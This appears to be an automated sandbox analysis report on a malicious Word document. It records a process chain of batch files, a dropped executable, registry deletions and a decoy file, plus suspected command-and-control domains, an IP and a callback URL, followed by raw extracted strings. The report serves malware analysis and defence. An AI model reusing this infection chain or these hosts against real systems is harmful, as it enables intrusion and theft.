  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
  "WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
  "WINWORD.EXE" touched file "C:\Windows\System32\en-US\setupapi.dll.mui"
  "WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
  "WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\cversions.1.db"
  "WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
  "WINWORD.EXE" touched file "C:\Windows\System32\rsaenh.dll"
  "WINWORD.EXE" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
  "WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
  "WINWORD.EXE" touched file "C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7D260DD4-47A3-49BD-BA04-FB1EB18F2FF6}.tmp"
  
  source
  
  API Call
  
  relevance
  
  7/10
Network Related
- Found potential URL in binary/memory
  
  details
  
  Heuristic match: "dns-verifon.com"
  Pattern match: "http://test1.ru/newbuild/t.php?stats=send&thread=0"
  Pattern match: "http://ocsp.int-x3.letsencrypt.org0/"
  Pattern match: "http://cert.int-x3.letsencrypt.org/0/"
  Pattern match: "www.dns-verifon.com0"
  Pattern match: "http://cps.letsencrypt.org0"
  Pattern match: "https://letsencrypt.org/repository/0"
  Pattern match: "http://isrg.trustid.ocsp.identrust.com0"
  Pattern match: "http://apps.identrust.com/roots/dstrootcax3.p7c0"
  Pattern match: "http://cps.root-x1.letsencrypt.org0"
  Pattern match: "http://crl.identrust.com/DSTROOTCAX3CRL.crl0"
  Heuristic match: "test1.ru"
  Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
  
  source
  
  String
  
  relevance
  
  10/10
System Security
- Hooks API calls
  
  details
  
  "OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
  "VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
  "SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
  "SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
  "VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
  
  source
  
  Hook Detection
  
  relevance
  
  10/10
Unusual Characteristics
- Drops a text file that contains suspicious strings (e.g. shell/ActiveX/DOM related)
  
  details
  
  "inteldriverupd1.sct" contains indicator "WScript.Shell" (Line: 15; Offset: 31)
  
  source
  
  Extracted File
  
  relevance
  
  8/10
- Installs hooks/patches the running process
  
  details
  
  "WINWORD.EXE" wrote bytes "eadce51b" to virtual address "0x6A579904" (part of module "RICHED20.DLL")
  "WINWORD.EXE" wrote bytes "410fea1b" to virtual address "0x6A6810AC" (part of module "MSPTLS.DLL")
  "WINWORD.EXE" wrote bytes "e9c532fcf0" to virtual address "0x761B6143" ("OleLoadFromStream@OLE32.DLL")
  "WINWORD.EXE" wrote bytes "7739bc7779a8c077be72c077d62dc0771de2bb7705a2c077c868bf7757d1c677bee3bb77616fc0776841be770050be7700000000ad37a6768b2da676b641a67600000000" to virtual address "0x75751000" (part of module "WSHIP6.DLL")
  "WINWORD.EXE" wrote bytes "c4ca5e7680bb5e76aa6e5f769fbb5e7608bb5e7646ce5e7661385f76de2f5f76d0d95e760000000017796b764f916b767f6f6b76f4f76b7611f76b76f2836b76857e6b7600000000" to virtual address "0x6ECF1000" (part of module "MSIMG32.DLL")
  "WINWORD.EXE" wrote bytes "9e0f3f1b" to virtual address "0x692FF530" (part of module "WWLIB.DLL")
  "WINWORD.EXE" wrote bytes "e93655b5f0" to virtual address "0x76083EAE" ("VariantClear@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "92e6bb7779a8c077be72c077d62dc0771de2bb7705a2c077bee3bb77616fc0776841be770050be7700000000ad37a6768b2da676b641a67600000000" to virtual address "0x75201000" (part of module "WSHTCPIP.DLL")
  "WINWORD.EXE" wrote bytes "4053be775858bf77186abf77653cc0770000000000bf5e760000000056cc5e76000000007cca5e76000000003768f3756a2cc077d62dc077000000002069f3750000000029a65e7600000000a48df37500000000f70e5e7600000000" to virtual address "0x76051000" (part of module "NSI.DLL")
  "WINWORD.EXE" wrote bytes "4b3a261b" to virtual address "0x6AEACA70" (part of module "GFX.DLL")
  "WINWORD.EXE" wrote bytes "e99e485af0" to virtual address "0x765F3D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
  "WINWORD.EXE" wrote bytes "e99a54b4f0" to virtual address "0x76083E59" ("SysFreeString@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "24d0031b" to virtual address "0x66DF0BA8" (part of module "MSO.DLL")
  "WINWORD.EXE" wrote bytes "e96033b5f0" to virtual address "0x76084731" ("SysAllocStringByteLen@OLEAUT32.DLL")
  "WINWORD.EXE" wrote bytes "e472541c" to virtual address "0x2F181B94" (part of module "WINWORD.EXE")
  "WINWORD.EXE" wrote bytes "d8c1211b" to virtual address "0x67DF78E4" (part of module "OART.DLL")
  "WINWORD.EXE" wrote bytes "e92399b7f0" to virtual address "0x76085DEE" ("VariantChangeType@OLEAUT32.DLL")
  "timeout.exe" wrote bytes "4053be775858bf77186abf77653cc0770000000000bf5e760000000056cc5e76000000007cca5e76000000003768f3756a2cc077d62dc077000000002069f3750000000029a65e7600000000a48df37500000000f70e5e7600000000" to virtual address "0x76051000" (part of module "NSI.DLL")
  "taskkill.exe" wrote bytes "4053be775858bf77186abf77653cc0770000000000bf5e760000000056cc5e76000000007cca5e76000000003768f3756a2cc077d62dc077000000002069f3750000000029a65e7600000000a48df37500000000f70e5e7600000000" to virtual address "0x76051000" (part of module "NSI.DLL")
  "reg.exe" wrote bytes "4053be775858bf77186abf77653cc0770000000000bf5e760000000056cc5e76000000007cca5e76000000003768f3756a2cc077d62dc077000000002069f3750000000029a65e7600000000a48df37500000000f70e5e7600000000" to virtual address "0x76051000" (part of module "NSI.DLL")
  
  source
  
  Hook Detection
  
  relevance
  
  10/10

File Details

All Details:

5635DF453843.doc

Filename: 5635DF453843.doc
Size: 351KiB (359569 bytes)
Type: doc office
Description: ASCII text, with very long lines, with no line terminators
Architecture
: WINDOWS
SHA256
: 0a6f0d53865ebe381d69f66c81454d725980da4405e10b4fcc32779bc0854a06
MD5
: 26406f5cc72e13c798485f80ad3cbbdb
SHA1
: a71cb5b7bf91cf0bdce08b6f5d808eb7c66f8e46

Resources

Icon

Visualization

Input File (PortEx)

Classification (TrID)

100.0% (.PZ2) Poser pose

Screenshots

Loading content, please wait...

Hybrid Analysis

Tip: Click an analysed process below to view more details.

Analysed 34 processes in total (System Resource Monitor).

WINWORD.EXE /n "C:\5635DF453843.doc" (PID: 3300)
- cmd.exe /C %TEMP%\TaSk.BaT (PID: 2956)
  - cmd.exe /K %TEMP%\2nd.bat (PID: 2740)
    - timeout.exe TIMEOUT 1 (PID: 2192)
    - exe.exe (PID: 2300) 5/66 Hash Seen Before
    - taskkill.exe taskkill /f /im WiNwOrD.ExE (PID: 2304)
    - reg.exe reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Resiliency /f (PID: 2208)
    - reg.exe reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Resiliency /f (PID: 2572)
    - reg.exe reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Resiliency /f (PID: 2104)
    - reg.exe reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Resiliency /f (PID: 2064)
    - reg.exe reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency /f (PID: 2540)
    - reg.exe reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency /f (PID: 2732)
    - reg.exe reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Resiliency /f (PID: 1548)
    - reg.exe reg delete HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency /f (PID: 2848)
    - cmd.exe /c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1" (PID: 2936)
      - reg.exe REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1" (PID: 2160)
    - cmd.exe /c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\File MRU" /v "Item 1" (PID: 2492)
      - reg.exe REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\File MRU" /v "Item 1" (PID: 2068)
    - cmd.exe /c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\File MRU" /v "Item 1" (PID: 3540)
      - reg.exe REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\File MRU" /v "Item 1" (PID: 3372)
    - cmd.exe /c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\File MRU" /v "Item 1" (PID: 2820)
      - reg.exe REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\File MRU" /v "Item 1" (PID: 2268)
    - cmd.exe /c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\File MRU" /v "Item 1" (PID: 3504)
      - reg.exe REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\File MRU" /v "Item 1" (PID: 3544)
    - cmd.exe /c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\File MRU" /v "Item 1" (PID: 3512)
      - reg.exe REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\File MRU" /v "Item 1" (PID: 3564)
    - cmd.exe /c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\File MRU" /v "Item 1" (PID: 3608)
      - reg.exe REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\File MRU" /v "Item 1" (PID: 3532)
    - cmd.exe /c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\File MRU" /v "Item 1" (PID: 3556)
      - reg.exe REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\File MRU" /v "Item 1" (PID: 3536)
    - WINWORD.EXE /n "%USERPROFILE%\Desktop\New Microsoft Word Document.docx" (PID: 1196)
- cmd.exe /C %TEMP%\TaSk.BaT (PID: 2728)
- DW20.EXE -x -s 1948 (PID: 2284) Hash Seen Before
EQNEDT32.EXE -Embedding (PID: 2012)

Logged Script Calls	Logged Stdout	Extracted Streams	Memory Dumps
Reduced Monitoring	Network Activityy	Network Error	Multiscan Match

Network Analysis

DNS Requests

Domain

Address

Registrar

Country

test1.ru
OSINT

Associated Artifacts for test1.ru

Details	Associated SHA256	Threat Level	Positives	Scan Date	Reference
Associated SHA256 9dbafb9f0cd168c836435203c4f76d803ed878cb9054320ba91f839190eca3f5 Threat Level no verdict Positives - Scan Date 04/20/2017 00:26:07 Reference AlienVault	9dbafb9f0cd168c836435203c4f76d803ed878cb9054320ba91f839190eca3f5	no verdict	-	04/20/2017 00:26:07	AlienVault

dns-verifon.com
OSINT

Associated Artifacts for dns-verifon.com

Whois Field	Value
Address	No.1001 Anling Road
City	Xiamen
Country	cn
Creation Date	Wed, 07 Mar 2018 00:00:00 GMT
DNSSEC	unsigned
DNSSEC	unsignedDelegation
Domain Name	DNS-VERIFON.COM
EMail	contact@ordertld.com
EMail	abuse@ordertld.com
Expiration Date	Thu, 07 Mar 2019 15:06:36 GMT
Expiration Date	Thu, 07 Mar 2019 00:00:00 GMT
Name Server	NS4.CNMSN.COM
Organization	Wuxi Yilian LLC
Reigstrar	CNOBIN INFORMATION TECHNOLOGY LIMITED
State	Fujian
Status	clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Status	clientDeleteProhibited (http://www.icann.org/epp#clientDeleteProhibited)
Last Update	Wed, 07 Mar 2018 15:06:36 GMT
Whois Server	whois.ordertld.com
Zip Code	361008

172.81.132.131
TTL: 599

CNOBIN INFORMATION TECHNOLOGY LIMITED

United States

Contacted Hosts

IP Address

Port/Protocol

Associated Process

Details

172.81.132.131

Associated Artifacts for 172.81.132.131

Details	Associated SHA256	Threat Level	Positives	Scan Date	Reference
Associated SHA256 cd9572ab21bae521120a2a0f3bbfd8085512504a2ae9aa217db03164828117c7 Threat Level malicious Positives 6/65 Scan Date 03/14/2018 14:14:08 Reference VirusTotal	cd9572ab21bae521120a2a0f3bbfd8085512504a2ae9aa217db03164828117c7	malicious	6/65	03/14/2018 14:14:08	VirusTotal

Details	Domain	Threat Level	Positives	Last Resolved	Reference
Domain dns-verifon.com Threat Level - Positives - Last Resolved 03/14/2018 00:00:00 VirusTotal Report	dns-verifon.com	-	-	03/14/2018 00:00:00	Report

TCP

exe.exe
PID: 2300

United States

Contacted Countries

HTTP Traffic

No relevant HTTP requests were made.

Extracted Strings

Download All Memory Strings (9.1KiB)

!"#$%&'%&'(

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

!"#$%'()*+,-0Root EntryFOz21TableWordDocument.SummaryInformation(DocumentSummaryInformation8&CompObjr

Ansi based on Dropped File (decoy.doc)

"%AppPath%"

Ansi based on Dropped File (2nd.bat)

"http://cps.root-x1.letsencrypt.org0<

Ansi based on PCAP Processing (network.pcap)

"http://ocsp.int-x3.letsencrypt.org0/

Ansi based on PCAP Processing (network.pcap)

"Hw"w P^O;<aY`GkxmPY[g

Ansi based on Dropped File (~WRC0000.tmp)

#;[6YIWZU+3~k

Ansi based on Dropped File (~WRC0000.tmp)

#http://cert.int-x3.letsencrypt.org/0/

Ansi based on PCAP Processing (network.pcap)

#Shows the contents of the Clipboard

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

$9z5YO1e:Lm6'XkzkU6Jyr|fl_0m b'xkfnzxURc@pa&=zQytPm_+/36{(Z* jY1CAAx;yE7U:h|&.Hi)z6`>zucUc;W1s zikUACgqpUC4{NL~KY62icyk63f

Ansi based on Dropped File (~WRC0000.tmp)

$^<wr=ocwwww6;K}=#w>\&!xf.p/qOXkp8Hjgu=O]V<4%^Tc7PK-!+:P[Content_Types].xmlPK-!N_rels/.relsPK-!-t:M0word/_rels/document.xml.relsPK-!word/document.xmlPK-!0C)word/theme/theme1.xmlPK-!-

Ansi based on Dropped File (~WRC0000.tmp)

%08lX

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

%d,%d

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

%d,%d,%d,%d

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

%JSjDts|5

Ansi based on Dropped File (~WRC0000.tmp)

%ld %s

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

%ld%c%0*ld %s

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

%PK!$;word/glossary/styles.xmlQS8o4$4P^i9J`m,@?V06wi:}>"RKDHK_ Xb?oNtT$d2V$~v"%AId?P% ka2;<<3ld(>p4L`Qz+wvGvhPh

Ansi based on Dropped File (~WRC0000.tmp)

%PROGRAMFILES%\Microsoft Office\Office14\wwlib.dll

Unicode based on Runtime Data (WINWORD.EXE )

%r,!oE7FCy#`9L 2=X2y#pu2vFT'o

Ansi based on Dropped File (~WRC0000.tmp)

%s - %s

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

%s,%s

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

%s=%s

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

%sD Br^gXG%X4)2S,`x%iSswN[3T@w8

Ansi based on Dropped File (~WRC0000.tmp)

%WINDIR%\system32\apphelp.dll

Unicode based on Runtime Data (WINWORD.EXE )

%windir%\tracing

Unicode based on Runtime Data (exe.exe )

&%d %s

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

&100%

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&200%

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&300%

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&400%

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&7q8M#8M

Ansi based on Dropped File (~WRC0000.tmp)

&Apply

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&At %

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Bold

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Bottom

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Columns

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&CopyCtrl+C

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Custom:

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Defaults

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Define...

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Don't show me this again

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Edit

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Equation Editor Help TopicsF1

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&File

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Fonts:

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Full

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Function

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Greek

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&http://isrg.trustid.ocsp.identrust.com0;

Ansi based on PCAP Processing (network.pcap)

&Italic

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Math

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Rows

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Size:

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

&Zoom...

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

'''''''

Ansi based on Image Processing (screen_6.png)

''-''

Ansi based on Image Processing (screen_3.png)

',,';c_'c_

Ansi based on Image Processing (screen_3.png)

'_lllla

Ansi based on Image Processing (screen_6.png)

'theme/theme/_rels/themeManager.xml.relsM

Ansi based on Dropped File (decoy.doc)

'theme/theme/_rels/themeManager.xml.relsPK]

Ansi based on Dropped File (decoy.doc)

'U8\qV.9jZ$MJCgq8`

Ansi based on Dropped File (~WRC0000.tmp)

(partial order)

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

(Rn4Ju*>6f\jid1a"iPe=X]2O

Ansi based on Dropped File (~WRC0000.tmp)

(tr;"P}&z~6p;Sa/KO09X"ByEVnan[mN[}$*1L-'%/!FN3\C`9zO+.|6RLLe+{=w/t.^yXgp}H,3|zA(y2(p8

Ansi based on Dropped File (~WRC0000.tmp)

)!crp-bgandfPyPenqzLeq5$d"fzR_Xv=Z[jY<;9+ZJ2X

Ansi based on Dropped File (~WRC0000.tmp)

)tn{elf%^8^];dH

Ansi based on Dropped File (~WRC0000.tmp)

+http://crl.identrust.com/DSTROOTCAX3CRL.crl0

Ansi based on PCAP Processing (network.pcap)

,,,_,,,

Ansi based on Image Processing (screen_6.png)

,,_'_P'

Ansi based on Image Processing (screen_3.png)

,.aic21h:qm@RN;d`o7gK(M&$R(.1r'JT8V"AHu}|$b{P8g/]QAs(#L[PK-![Content_Types].xmlPK-!60_rels/.relsPK-!kytheme/theme/themeManager.xmlPK-!Tctheme/theme/theme1.xmlPK-!

Ansi based on Dropped File (decoy.doc)

,_,_.

Ansi based on Image Processing (screen_3.png)

,__8_

Ansi based on Image Processing (screen_3.png)

-+[o^IJq,Mvm2M]alZ>U;2=XR[ dgF]I}Q%F~DkB]-Pg6T]>T}fsbHx^(]>\<[v-kkL !I*^' |Ctw6-%'N2X"7= D'Xj"u`Pj.C>Q|

Ansi based on Dropped File (~WRC0000.tmp)

----------------------------Cisco Catalyst Log Entry 03.13.2018 EOF----------------------------

Ansi based on Dropped File (decoy.doc)

----------------------------Cisco Catalyst Log Entry 03.13.2018----------------------------

Ansi based on Dropped File (decoy.doc)

-Bold

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

-BoldItalic

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

-Embedding

Ansi based on Process Commandline (EQNEDT32.EXE)

-Italic

Ansi based on Hybrid Analysis (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00401000.00000020.mdmp)

-JL'_P_

Ansi based on Image Processing (screen_6.png)

-v"YmR04hYW8hGyfz',I9}a])c~wrr;@P+-PuQPVgU

Ansi based on Dropped File (~WRC0000.tmp)

-x -s 1948

Ansi based on Process Commandline (DW20.EXE)

. . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

. . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

.-;J+;F>hXdB%?y\MCG-ayVf&eBn(5&NI`V7rb*<GqGO,68M7p;PU 6X+fT=v&Pj7NxX'j,'u8M#8M#8M

Ansi based on Dropped File (~WRC0000.tmp)

.\-/n*x]+8lq!P1lf><DX,|8h((6|e_,\7}V1}D>}<=G>UgJ&tTa

Ansi based on Dropped File (~WRC0000.tmp)

.C. Greek . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

.C. Greek . . . . . . . . . .

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

.K.W0*lm/Go_W-]mc'XP|<.5uq7R0&H8B4=N<s=qxPVO6||M#/8<~]rT=^/H7!MfZH2Haf!VVX4-,2U,ZF9j&`OYSevU2f

Ansi based on Dropped File (decoy.doc)

.rdata

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.00400000.00000040.mdmp)

.rdata$zzzdbg

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.00400000.00000040.mdmp)

.rsrc

Ansi based on Dropped File (exe.exe.634531026)

.text

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.00400000.00000040.mdmp)

.text$mn

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.00400000.00000040.mdmp)

.us>b=,[_PsP'|u>^^W3T$1SUBRq$0op?PK!:word/webSettings.xmln0UvTQ8lBB`ZBJ~inq>S9K1%

Ansi based on Dropped File (~WRC0000.tmp)

/C %TEMP%\TaSk.BaT

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/http://apps.identrust.com/roots/dstrootcax3.p7c0

Ansi based on PCAP Processing (network.pcap)

/K %TEMP%\2nd.bat

Ansi based on Process Commandline (cmd.exe)

/n "%USERPROFILE%\Desktop\New Microsoft Word Document.docx"

Ansi based on Process Commandline (WINWORD.EXE)

/n "C:\5635DF453843.doc"

Ansi based on Process Commandline (WINWORD.EXE)

0,_,_

Ansi based on Image Processing (screen_0.png)

0110900

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

0123456789ABCDEF

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00454000.00000004.mdmp)

019C826E445A4649A5B00BF08FCC4EEE

Unicode based on Runtime Data (WINWORD.EXE )

01KG=0O B01;8F04

Ansi based on Dropped File (decoy.doc)

0Thgdmh}0Qf{?gdm,1h. A!"R#n$n%

Ansi based on Dropped File (decoy.doc)

0u:o@P]H'!3}e'*n+i Z z

Ansi based on Dropped File (~WRC0000.tmp)

0woo&5

Ansi based on Dropped File (decoy.doc)

0Your equation requires too many different fonts.+Internal Error #%d. Contact Design Science.

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

1*?f8&,8N>hR*"(zsy2!#YQ$\h2>:<xzx,-4qm0-:q_qgNVfD]_dvxL;{v_ZS4S.OtKn[-xus^R ^Rz%^jwWxw]k`2a~9_jSLX,[{>HCA84Bq.UJR_O]-4k!D=zvg?s6reGT{</|N:OWB_?>xo'hGIs;WY;YCDtv<(Fr

Ansi based on Dropped File (decoy.doc)

160317164046Z

Ansi based on PCAP Processing (network.pcap)

180307211456Z

Ansi based on PCAP Processing (network.pcap)

180605211456Z0

Ansi based on PCAP Processing (network.pcap)

1Q3g3

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

1WsH=O^QN+T)Ep!BTETxBEG}h\fq/U~&e~cMc,9&J!.u.RB>B.A|p^owJH{.6K2/lS8qQ

Ansi based on Dropped File (~WRC0000.tmp)

2000 Microsoft Corporation

Unicode based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

210317164046Z0J1

Ansi based on PCAP Processing (network.pcap)

2<S1V/

Ansi based on Dropped File (~WRC0000.tmp)

2FhsF+Y\n:3E[69`&45Z!*5k8`Fmw-"d>zn"ZxJZp;{/<P;,)''KQk5qpN8KGbe

Ansi based on Dropped File (~WRC0000.tmp)

3 3<7

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

3$3(3

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

3K4'+rzQ

Ansi based on Dropped File (~WRC0000.tmp)

4$4,444<4D4L4T4\4d4

Ansi based on Memory/File Scan (EQNEDT32.EXE , 00018086-00002012.00000002.24579.00469000.00000002.mdmp)

